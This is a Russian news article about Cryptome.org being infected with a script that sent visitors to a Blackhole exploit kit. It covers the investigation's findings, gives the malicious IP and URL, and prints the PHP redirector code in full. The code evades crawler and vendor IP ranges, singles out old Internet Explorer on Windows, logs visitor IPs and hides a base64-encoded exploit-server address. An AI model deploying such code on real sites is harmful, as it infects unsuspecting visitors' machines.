Основанный в 1996 году, сайт Cryptome.org долгие годы был отличным хакерским ресурсом, где можно было узнать последние новости в области криптографии, массовой слежки, свободы слова, национальной безопасности, разведки и технологий двойного назначения, которые используют правительства и корпорации. Этот проект был предшественником Wikileaks — сюда выкладывались секретные государственные документы и протоколы, которые открывали истинное положение вещей в «самом демократическом» государстве мира.
Сейчас на сайте собрано более 70 тыс. файлов, в том числе список предполагаемых агентов MI-6, фотографии экспертов-форенсиков после терактов 11/11, подробные карты правительственных учреждений США (сделанные на базе открытых источников, геодезия и аэрофотосъёмка), любительские снимки с войны в Ираке с тысячами убитых солдат и мирных жителей, руководство Microsoft по шпионажу и другие уникальные документы, некоторые из которых ранее нигде не публиковались.
В общем, для создателей Cryptome.org не существовало авторитетов, и они продолжали свою работу даже после обысков ФБР, закрытия доступа несколькими провайдерами и «наездов» корпораций. Но несколько дней назад сайт всё-таки пришлось закрыть ненадолго. На одной из страниц был обнаружен скрипт, который перенаправлял пользователей на вредоносный сайт с набором эксплоитов Blackhole. IP-адрес этого сайта 65.75.137.243 и конкретный адрес http://65.75.137.243/Home/index.php за несколько дней до этого уже был занесён в «чёрный список» Symantec, и компания предложила сайту помощь в расследовании инцидента.
Расследование показало, что заражённый файл ../0002/afg/afg.php появился 8 февраля в директории ../0002/afg/, вместе с новой поддиректорией ../0002/afg/main. Там, в свою очередь, оказалось 2863 файла .log с IP-адресами:
184.96.244.216.log
Судя по всему, эти файлы были добавлены в период с 8 по 12 февраля и соответствуют IP-адресам посетителей сайта, которые запустили вредоносный скрипт.
Дальнейшее расследование показало, что 8 февраля ссылка на скрипт SCRIPT src="https://xakep.ru/wp-content/uploads/post/58279//0002/afg/afg.php" была добавлена во все 6000 файлов в основной директории Cryptome. В итоге, заражённым оказался каждый HTML-файл на сайте Cryptome.
В данный момент заканчивается очистка сайта от вредоносных скриптов.
Содержимое вредоносного скрипта afg.php практически не отличается от ранее известных экземпляров того же типа (1, 2, 3).
function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}
function net()
{
$ip=$_SERVER['REMOTE_ADDR'];
if(
net_match('64.233.160.0/19',$ip)==0 &&
net_match('66.102.0.0/20',$ip)==0 &&
net_match('66.249.64.0/19',$ip)==0 &&
net_match('72.14.192.0/18',$ip)==0 &&
net_match('74.125.0.0/16',$ip)==0 &&
net_match('89.207.224.0/24',$ip)==0 &&
net_match('193.142.125.0/24',$ip)==0 &&
net_match('194.110.194.0/24',$ip)==0 &&
net_match('209.85.128.0/17',$ip)==0 &&
net_match('216.239.32.0/19',$ip)==0 &&
net_match('128.111.0.0/16',$ip)==0 &&
net_match('67.217.0.0/16',$ip)==0 &&
net_match('188.93.0.0/16',$ip)==0
)
return true;
}
function detect_os() {
global $os;
$user_agent = $_SERVER['HTTP_USER_AGENT'];
if(strpos($user_agent, "Windows") !== false) $os = 'windows';
}detect_os();
function detect_brows() {
global $OOOOO0000, $OOOOOO000;
$user_agent = $_SERVER["HTTP_USER_AGENT"];
if (preg_match("/MSIE 6.0/", $user_agent) OR
preg_match("/MSIE 7.0/", $user_agent) OR
preg_match("/MSIE 8.0/", $user_agent)
) $OOOOOO000 = "MSIE";
}detect_brows();
$IP = $_SERVER['REMOTE_ADDR'].".log";
function _log()
{ global $IP;
touch ("./main/{$IP}");
}
@mkdir('main');
function _check()
{
global $IP;
if(!file_exists("./main/{$IP}")) return true;
}
$dfjgkbl=base64_decode('aHR0cDovLzY1Ljc1LjEzNy4yNDMvSG9tZS9pbmRleC5waHA=');
if(_check())
{
if(net())
{
if($os)
{
if($OOOOOO000 == "MSIE")
{
echo 'document.write(\'\');';
_log();
}}}}
